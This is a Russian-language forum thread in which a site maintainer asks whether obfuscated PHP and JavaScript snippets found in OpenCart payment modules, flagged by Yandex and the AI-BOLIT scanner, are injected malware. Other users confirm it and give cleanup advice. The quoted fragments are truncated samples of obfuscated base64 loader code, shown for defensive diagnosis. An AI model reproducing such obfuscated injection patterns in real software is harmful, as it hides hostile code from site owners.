Рекомендуемые сообщения

Allaur    18

Доброго времени суток!
В начале прошлого месяца поисковик яндекс вдруг заблокировал несколько моих сайтов, типа вредоносный код на сайте.

Понаходил в некоторых скриптах внедрённый код типа 
 

function oA4m(mHD){return saq8(hQjX20(mHD)

Поудалял. всё равно яндекс ругается. Покапался глубже. Нашёл в файлах  некоторых модулей php код типа

<? $GLOBALS['_1586600620_']=Array(base64_decode('aW' .'5pX' .'3Nl' .'dA=='),base64_decode(

Модули типа Yandex Money Payment
Если код в скриптах стоит  в самом конце файла, то $GLOBALS находится в середине файла.

И вот не пойму, это внедрённый код или требуемый для работы модуля...
Для поиска вредоносного кода использую AI-BOLIT

Вот пример на что ругается айболит
 

/admin/controller/payment/yandexplusplus.php
[x] 1…WFuZGV4cGx1c3BsdXNfbGljZW5zZQ==','ZW50cnlfbGljZW5zZQ==','ZW50cnlfbGljZW5zZQ=='); return base64_decode($a[$i]);}?><?php if(($this->request->server[_981769965(0)]

/admin/controller/payment/yandexplusplus_card.php
[x] 1GV4cGx1c3BsdXNfY2FyZF9saWNlbnNl','ZW50cnlfbGljZW5zZQ==','ZW50cnlfbGljZW5zZQ=='); return base64_decode($a[$i]);}?><?php if(($this->request->server[_1853304191(0)

/vqmod/vqcache/vq2-admin_controller_payment_yandexplusplus.php
[x] 1WFuZGV4cGx1c3BsdXNfbGljZW5zZQ==','ZW50cnlfbGljZW5zZQ==','ZW50cnlfbGljZW5zZQ=='); return base64_decode($a[$i]);}?><?php if(($this->request->server[_981769965(0)]

/vqmod/vqcache/vq2-admin_controller_payment_yandexplusplus_card.php
[x] 1dXM=','eWFuZGV4cGx1c3BsdXNfY2FyZF9saWNlbnNl','bGljZW5zZQ==','ZXJyb3Jfa2V5X2Vy'); return base64_decode($a[$i]);}?><?php if(!$this->request->post[_881163321(0)]){

 

Это действительно вредоносный код?
Чем можно проверить сайт на наличие вирусов?
Онлайн сервисы просто говорят что сайт заражён и данных о заражённых файлах не дают.
 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
chukcha    986

ЭТО внедренный код
Правильный код опенкарта не чодержит и не работает с глобальными переменными

 

Ну так раскодируйте, то что вам подсовывают

Искать нужно по всем файлам!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Shureg    157

А что мешает сверить с исходным кодом модулей? Или с бэкапом сайта?

 

Вообще, подозреваю, что если покопаться еще глубже, то новое найдется. Проверять сайт на наличие можно тем же айболитом, руками, сравнением с бэкапом, наймом проверятеля и т.п.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Eldaeron    85

Если вам интересно так то вот https://stackoverflow.com/questions/8398749/decode-base64-in-array-to-figure-out-hackers-intents

 

Можете раскодировать посмотреть что вам за свинью подсунули))).

 

Модули лицензионные или feofan/lowenet ?

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Allaur    18
3 часа назад, chukcha сказал:

ЭТО внедренный код
Правильный код опенкарта не чодержит и не работает с глобальными переменными

 

Понял, спасибо
 

 

3 часа назад, Shureg сказал:

А что мешает сверить с исходным кодом модулей? Или с бэкапом сайта?

 

Сайты не мои, моих клиентов, я их не админю(денег жмут ), они сами бекапов не делают.
 

 

3 часа назад, Eldaeron сказал:

Если вам интересно так то вот https://stackoverflow.com/questions/8398749/decode-base64-in-array-to-figure-out-hackers-intents

 

Можете раскодировать посмотреть что вам за свинью подсунули))).

 

Модули лицензионные или feofan/lowenet ?

 

спсибо за сссылку
Модуль яндекса ставил сам хозяин сайта. Где брал не знаю.
С феофана модули не качаю , на заре своей деятельности понял что черевато последствиями всевозможных редиректов))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти


  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу